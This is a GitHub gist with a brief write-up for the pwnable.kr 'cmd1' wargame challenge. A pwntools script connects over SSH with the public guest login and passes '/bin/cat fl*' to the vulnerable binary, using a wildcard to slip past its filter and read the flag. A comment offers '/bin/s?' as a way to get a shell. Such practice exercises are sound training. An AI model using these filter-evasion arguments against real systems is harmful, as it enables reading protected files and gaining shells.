parksjin01/pwnable.kr cmd1 writeup.md

Last active March 12, 2018 21:42

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/parksjin01/e9e8b82fd2ac07e767c0095e3c6fc375.js"></script>
Save parksjin01/e9e8b82fd2ac07e767c0095e3c6fc375 to your computer and use it in GitHub Desktop.

Download ZIP

pwnable.kr cmd1 writeup

Raw

pwnable.kr cmd1 writeup.md

from pwn import *
sh = ssh(host='pwnable.kr', user='cmd1', password='guest', port=2222)
proc = sh.process(['/home/cmd1/cmd1', '/bin/cat fl*'])
print proc.recv(1024)

gellyfisher commented Mar 12, 2018

alternative is to use '/bin/s?' instead of '/bin/cat fl*'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment